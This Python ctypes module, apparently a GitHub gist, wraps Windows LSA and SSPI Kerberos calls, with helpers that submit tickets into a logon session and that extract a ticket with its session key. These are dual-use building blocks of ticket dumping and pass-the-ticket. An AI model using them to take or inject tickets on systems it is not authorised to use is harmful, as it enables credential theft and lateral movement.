KERB_SUBMIT_TKT_REQUEST_OFFSET = sizeof(KERB_SUBMIT_TKT_REQUEST)
def submit_tkt_helper(ticket_data, logonid=0):
    """Build a ticket-submission request with ``ticket_data`` appended inline.

    Args:
        ticket_data: bytes of the credential to submit.
        logonid: target logon session, as an ``int`` or a ``LUID``.

    Returns:
        An instance of a locally defined, 4-byte-packed structure whose
        trailing ``TicketData`` array holds ``ticket_data``.
    """
    luid = LUID.from_int(logonid) if isinstance(logonid, int) else logonid
    data_len = len(ticket_data)

    # The layout depends on the payload length, so the type is built per call.
    # The key is spelled out as separate Length/Value fields here.
    class KERB_SUBMIT_TKT_REQUEST(Structure):
        _pack_ = 4
        _fields_ = [
            ("MessageType", DWORD),
            ("LogonId", LUID),
            ("TicketFlags", ULONG),
            ("Length", ULONG),
            ("Value", PVOID),
            ("KerbCredSize", ULONG),
            ("KerbCredOffset", ULONG),
            ("TicketData", c_byte * data_len),
        ]

    req = KERB_SUBMIT_TKT_REQUEST()
    req.MessageType = KERB_PROTOCOL_MESSAGE_TYPE.KerbSubmitTicketMessage.value
    req.LogonId = luid
    req.TicketFlags = 0
    # "Key" is not a declared field of the local structure, so this only sets
    # a plain Python attribute on the instance.
    req.Key = KERB_CRYPTO_KEY()
    req.KerbCredSize = data_len
    req.TicketData = (c_byte * data_len)(*ticket_data)
    # NOTE(review): the "- 4" presumably accounts for the 4-byte packing of
    # the local layout versus the module-level header -- confirm.
    req.KerbCredOffset = KERB_SUBMIT_TKT_REQUEST_OFFSET - 4
    return req
class KERB_RETRIEVE_TKT_REQUEST(Structure):
    """Request structure for retrieving an encoded ticket by target name."""

    _fields_ = [
        ("MessageType", DWORD),
        ("LogonId", LUID),
        ("TargetName", LSA_UNICODE_STRING),
        ("TicketFlags", ULONG),
        ("CacheOptions", ULONG),
        ("EncryptionType", LONG),
        ("CredentialsHandle", PVOID),
    ]

    def __init__(
        self,
        targetname,
        ticketflags=0x0,
        cacheoptions=0x8,
        encryptiontype=0x0,
        logonid=0,
    ):
        """Fill in the request for ``targetname``.

        ``logonid`` may be an ``int`` (converted with ``LUID.from_int``) or a
        ``LUID``. ``CredentialsHandle`` is always left null.
        """
        luid = LUID.from_int(logonid) if isinstance(logonid, int) else logonid
        message_type = KERB_PROTOCOL_MESSAGE_TYPE.KerbRetrieveEncodedTicketMessage.value
        target = LSA_UNICODE_STRING.from_string(targetname)
        super(KERB_RETRIEVE_TKT_REQUEST, self).__init__(
            message_type,
            luid,
            target,
            ticketflags,
            cacheoptions,
            encryptiontype,
            None,
        )
def retrieve_tkt_helper(
    targetname,
    logonid=0,
    ticketflags=0x0,
    cacheoptions=0x8,
    encryptiontype=0x0,
    temp_offset=0,
):
    """Build a ticket-retrieval request with the target name stored inline.

    The returned structure carries the UTF-16-LE name in a trailing byte
    array, and its ``TargetName.Buffer`` points back into the structure's
    own memory.

    Args:
        targetname: name to request a ticket for.
        logonid: logon session, as an ``int`` or a ``LUID``.
        ticketflags, cacheoptions, encryptiontype: copied into the request.
        temp_offset: accepted but not used by this function.
    """
    luid = LUID.from_int(logonid) if isinstance(logonid, int) else logonid

    name_bytes = targetname.encode("utf-16-le")
    name_terminated = name_bytes + b"\x00\x00"
    alloc_len = len(name_terminated)

    # The layout depends on the name length, so the type is built per call.
    class KERB_RETRIEVE_TKT_REQUEST(Structure):
        _fields_ = [
            ("MessageType", DWORD),
            ("LogonId", LUID),
            ("TargetName", LSA_UNICODE_STRING),
            ("TicketFlags", ULONG),
            ("CacheOptions", ULONG),
            ("EncryptionType", LONG),
            ("CredentialsHandle", PVOID),
            ("UNK", PVOID),
            ("TargetNameData", (c_byte * alloc_len)),
        ]

    req = KERB_RETRIEVE_TKT_REQUEST()
    req.MessageType = KERB_PROTOCOL_MESSAGE_TYPE.KerbRetrieveEncodedTicketMessage.value
    req.LogonId = luid
    req.TicketFlags = ticketflags
    req.CacheOptions = cacheoptions
    req.EncryptionType = encryptiontype
    req.TargetNameData = (c_byte * alloc_len)(*name_terminated)

    # Locate the inline name: step back alloc_len bytes from the end of the
    # structure, then round down to a pointer-size boundary.
    # NOTE(review): the rounding presumably undoes trailing struct padding so
    # the address lands on the start of TargetNameData -- confirm.
    tail_start = addressof(req) + sizeof(req) - alloc_len
    name_address = tail_start - (tail_start % sizeof(c_void_p))

    lsa_target = LSA_UNICODE_STRING()
    lsa_target.Length = len(name_bytes)
    lsa_target.MaximumLength = alloc_len
    lsa_target.Buffer = cast(name_address, POINTER(c_char))
    req.TargetName = lsa_target
    return req
class KERB_RETRIEVE_TKT_RESPONSE(Structure):
    """Response wrapper holding a single ``KERB_EXTERNAL_TICKET``."""

    _fields_ = [("Ticket", KERB_EXTERNAL_TICKET)]
# All-ones pointer value (-1 reinterpreted as an unsigned address).
try:
    INVALID_HANDLE_VALUE = c_void_p(-1).value
except TypeError:
    # Fallback: spell the constant out for the pointer widths we know about.
    if sizeof(c_void_p) == 8:
        INVALID_HANDLE_VALUE = 0xFFFFFFFFFFFFFFFF
    elif sizeof(c_void_p) == 4:
        INVALID_HANDLE_VALUE = 0xFFFFFFFF
    else:
        raise
def get_lsa_error(ret_status):
    """Return (not raise) the ``WinError`` matching NTSTATUS ``ret_status``."""
    win_code = LsaNtStatusToWinError(ret_status)
    return WinError(win_code)
def LsaRaiseIfNotErrorSuccess(result, func=None, arguments=()):
    """ctypes ``errcheck`` hook: pass ``ERROR_SUCCESS`` through, raise otherwise.

    ``func`` and ``arguments`` are part of the errcheck signature and are
    not used.

    Raises:
        OSError: the ``WinError`` translated from ``result`` when it is not
            ``ERROR_SUCCESS``.
    """
    if result == ERROR_SUCCESS:
        return result
    raise WinError(LsaNtStatusToWinError(result))
def LsaNtStatusToWinError(errcode):
    """Translate NTSTATUS ``errcode`` through ``Advapi32.LsaNtStatusToWinError``.

    Raises:
        Exception: if the translation yields 0x13D, the value returned when
            no mapping exists for ``errcode``.
    """
    translate = windll.Advapi32.LsaNtStatusToWinError
    translate.restype = ULONG
    translate.argtypes = [NTSTATUS]
    win_code = translate(errcode)
    if win_code != 0x13D:
        return win_code
    raise Exception("ERROR_MR_MID_NOT_FOUND for %s" % errcode)
def LsaFreeReturnBuffer(pbuffer):
    """Release ``pbuffer`` through ``Secur32.LsaFreeReturnBuffer``.

    A non-success status is raised by the ``LsaRaiseIfNotErrorSuccess``
    errcheck hook; nothing is returned.
    """
    free_buffer = windll.Secur32.LsaFreeReturnBuffer
    free_buffer.restype = NTSTATUS
    free_buffer.argtypes = [PVOID]
    free_buffer.errcheck = LsaRaiseIfNotErrorSuccess
    free_buffer(pbuffer)
def LsaConnectUntrusted():
    """Open a connection via ``Secur32.LsaConnectUntrusted`` and return its handle.

    The handle starts as ``INVALID_HANDLE_VALUE`` and is overwritten by the
    call; a non-success status is raised by the errcheck hook.
    """
    connect = windll.Secur32.LsaConnectUntrusted
    connect.restype = NTSTATUS
    connect.argtypes = [PHANDLE]
    connect.errcheck = LsaRaiseIfNotErrorSuccess

    handle = HANDLE(INVALID_HANDLE_VALUE)
    connect(byref(handle))
    return handle
def LsaLookupAuthenticationPackage(lsa_handle, package_name):
    """Return the numeric id of the authentication package ``package_name``.

    Args:
        lsa_handle: connection handle to query.
        package_name: package name as ``str`` (encoded with the default
            codec) or ``bytes``.
    """
    lookup = windll.Secur32.LsaLookupAuthenticationPackage
    lookup.restype = NTSTATUS
    lookup.argtypes = [HANDLE, PLSA_STRING, PULONG]
    lookup.errcheck = LsaRaiseIfNotErrorSuccess

    name_bytes = package_name.encode() if isinstance(package_name, str) else package_name

    # Counted string: Length excludes the terminating NUL, MaximumLength includes it.
    name_struct = LSA_STRING()
    name_struct.Buffer = create_string_buffer(name_bytes)
    name_struct.Length = len(name_bytes)
    name_struct.MaximumLength = len(name_bytes) + 1

    package_id = ULONG(0)
    lookup(lsa_handle, byref(name_struct), byref(package_id))
    return package_id.value
def LsaCallAuthenticationPackage(lsa_handle, package_id, message):
    """Send ``message`` to an authentication package and collect the reply.

    Args:
        lsa_handle: connection handle.
        package_id: numeric id of the target package.
        message: a ctypes ``Structure``, or any object convertible with
            ``bytes()``.

    Returns:
        ``(reply_bytes, protocol_status, free_ptr)``. ``reply_bytes`` is a
        copy of the returned buffer (``b""`` when empty). ``free_ptr`` is the
        buffer pointer to release with ``LsaFreeReturnBuffer`` once the caller
        has finished with memory the reply points into, or ``None`` when no
        data came back.

    Raises:
        OSError: from the errcheck hook when the call itself fails.
    """
    call_package = windll.Secur32.LsaCallAuthenticationPackage
    call_package.argtypes = [
        HANDLE,
        ULONG,
        PVOID,
        ULONG,
        PVOID,
        PULONG,
        PNTSTATUS,
    ]
    call_package.restype = DWORD
    call_package.errcheck = LsaRaiseIfNotErrorSuccess

    if isinstance(message, Structure):
        message_len = sizeof(message)
    else:
        # byref() only accepts ctypes instances, so raw bytes are copied into
        # a ctypes buffer first instead of being passed as a bytes object.
        raw = bytes(message)
        message_len = len(raw)
        message = create_string_buffer(raw, message_len)

    return_msg_p = c_void_p()
    return_msg_len = ULONG(0)
    return_status = NTSTATUS(INVALID_HANDLE_VALUE)
    call_package(
        lsa_handle,
        package_id,
        byref(message),
        message_len,
        byref(return_msg_p),
        byref(return_msg_len),
        byref(return_status),
    )

    return_msg = b""
    free_ptr = None
    if return_msg_len.value > 0:
        return_msg = string_at(return_msg_p, return_msg_len.value)
        free_ptr = return_msg_p
    return return_msg, return_status.value, free_ptr
def AcquireCredentialsHandle(
    client_name, package_name, tragetspn, cred_usage, pluid=None, authdata=None
):
    """Obtain a credential handle via ``Secur32.AcquireCredentialsHandleA``.

    Args:
        client_name: principal name (ASCII), or a falsy value for none.
        package_name: security package name (ASCII).
        tragetspn: accepted for signature compatibility; not used here.
        cred_usage: credential-use flags passed straight to the call.
        pluid: optional logon-id pointer.
        authdata: optional package-specific authentication data.

    Returns:
        The populated ``CredHandle``.

    Raises:
        Exception: if the call returns anything other than ``SEC_E.OK``.
    """

    def errc(result, func, arguments):
        if result == SEC_E.OK.value:
            return result
        # A code missing from SEC_E must still produce the descriptive
        # failure below, not a bare ValueError from the enum lookup.
        try:
            status = SEC_E(result)
        except ValueError:
            status = "unknown status 0x%08X" % result
        raise Exception(
            "%s failed with error code %s (%s)"
            % ("AcquireCredentialsHandle", result, status)
        )

    acquire = windll.Secur32.AcquireCredentialsHandleA
    acquire.argtypes = [
        PSEC_CHAR,
        PSEC_CHAR,
        ULONG,
        PLUID,
        PVOID,
        PVOID,
        PVOID,
        PCredHandle,
        PTimeStamp,
    ]
    acquire.restype = DWORD
    acquire.errcheck = errc

    cn = LPSTR(client_name.encode("ascii")) if client_name else None
    pn = LPSTR(package_name.encode("ascii"))
    creds = CredHandle()
    ts = TimeStamp()
    acquire(cn, pn, cred_usage, pluid, authdata, None, None, byref(creds), byref(ts))
    return creds
def QueryContextAttributes(ctx, attr, sec_struct):
    """Fill ``sec_struct`` with attribute ``attr`` of security context ``ctx``.

    Calls ``Secur32.QueryContextAttributesW`` with ``attr.value``. The result
    is written into ``sec_struct`` in place; nothing is returned.

    Raises:
        Exception: if the call returns anything other than ``SEC_E.OK``.
    """

    def errc(result, func, arguments):
        if result == SEC_E.OK.value:
            return SEC_E.OK
        # A code missing from SEC_E must still produce the descriptive
        # failure below, not a bare ValueError from the enum lookup.
        try:
            status = SEC_E(result)
        except ValueError:
            status = "unknown status 0x%08X" % result
        raise Exception(
            "%s failed with error code %s (%s)"
            % ("QueryContextAttributes", result, status)
        )

    query = windll.Secur32.QueryContextAttributesW
    query.argtypes = [PCtxtHandle, ULONG, PVOID]
    query.restype = DWORD
    query.errcheck = errc
    query(byref(ctx), attr.value, byref(sec_struct))
    return
def InitializeSecurityContext(
    creds,
    target,
    ctx=None,
    flags=ISC_REQ.INTEGRITY
    | ISC_REQ.CONFIDENTIALITY
    | ISC_REQ.SEQUENCE_DETECT
    | ISC_REQ.REPLAY_DETECT,
    TargetDataRep=0,
    token=None,
):
    """Run one step of ``Secur32.InitializeSecurityContextA``.

    Args:
        creds: credential handle to authenticate with.
        target: target name (ASCII), or a falsy value for none.
        ctx: context handle from a previous step; omit on the first call.
        flags: requested context flags.
        TargetDataRep: data-representation argument passed to the call.
        token: input token bytes from the peer, if any.

    Returns:
        ``(status, ctx, buffers, out_flags, expiry)``: the ``SEC_E`` status,
        the (possibly new) context handle, the output buffers as
        ``(type, bytes)`` pairs, the flags reported back as ``ISC_REQ``, and
        the expiry timestamp structure.

    Raises:
        Exception: if the call returns a status outside the accepted set.
    """
    accepted = (
        SEC_E.OK,
        SEC_E.COMPLETE_AND_CONTINUE,
        SEC_E.COMPLETE_NEEDED,
        SEC_E.CONTINUE_NEEDED,
        SEC_E.INCOMPLETE_CREDENTIALS,
    )

    def errc(result, func, arguments):
        # A code missing from SEC_E must still produce the descriptive
        # failure below, not a bare ValueError from the enum lookup.
        try:
            status = SEC_E(result)
        except ValueError:
            status = None
        if status in accepted:
            return status
        described = status if status is not None else "unknown status 0x%08X" % result
        raise Exception(
            "%s failed with error code %s (%s)"
            % ("InitializeSecurityContext", result, described)
        )

    init_ctx = windll.Secur32.InitializeSecurityContextA
    init_ctx.argtypes = [
        PCredHandle,
        PCtxtHandle,
        PSEC_CHAR,
        ULONG,
        ULONG,
        ULONG,
        PSecBufferDesc,
        ULONG,
        PCtxtHandle,
        PSecBufferDesc,
        PULONG,
        PTimeStamp,
    ]
    init_ctx.restype = DWORD
    init_ctx.errcheck = errc

    ptarget = LPSTR(target.encode("ascii")) if target else None
    newbuf = SecBufferDesc()
    outputflags = ULONG()
    expiry = TimeStamp()
    if token:
        token = SecBufferDesc([SecBuffer(token)])

    # First step: no existing context goes in and a fresh handle receives the
    # new one. Later steps pass the same handle as both input and output.
    if ctx:
        existing_ctx = byref(ctx)
    else:
        existing_ctx = None
        ctx = CtxtHandle()

    res = init_ctx(
        byref(creds),
        existing_ctx,
        ptarget,
        int(flags),
        0,
        TargetDataRep,
        byref(token) if token else None,
        0,
        byref(ctx),
        byref(newbuf),
        byref(outputflags),
        byref(expiry),
    )
    data = newbuf.Buffers
    return res, ctx, data, ISC_REQ(outputflags.value), expiry
def extract_ticket(lsa_handle, package_id, luid, target_name):
    """Retrieve the ticket for ``target_name`` from logon session ``luid``.

    Returns:
        ``{"Key": {...}, "Ticket": bytes}`` as produced by
        ``KERB_EXTERNAL_TICKET.get_data``, or ``{}`` when the package
        returned no data.

    Raises:
        OSError: the ``WinError`` for a non-zero protocol status.
    """
    message = retrieve_tkt_helper(target_name, logonid=luid)
    ret_msg, ret_status, free_ptr = LsaCallAuthenticationPackage(
        lsa_handle, package_id, message
    )
    try:
        if ret_status != 0:
            raise WinError(LsaNtStatusToWinError(ret_status))
        if not ret_msg:
            return {}
        resp = KERB_RETRIEVE_TKT_RESPONSE.from_buffer_copy(ret_msg)
        # get_data() copies the key and ticket bytes, so it must run before
        # the return buffer they point into is released below.
        return resp.Ticket.get_data()
    finally:
        # Release the return buffer on every path, including errors.
        if free_ptr is not None:
            LsaFreeReturnBuffer(free_ptr)
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment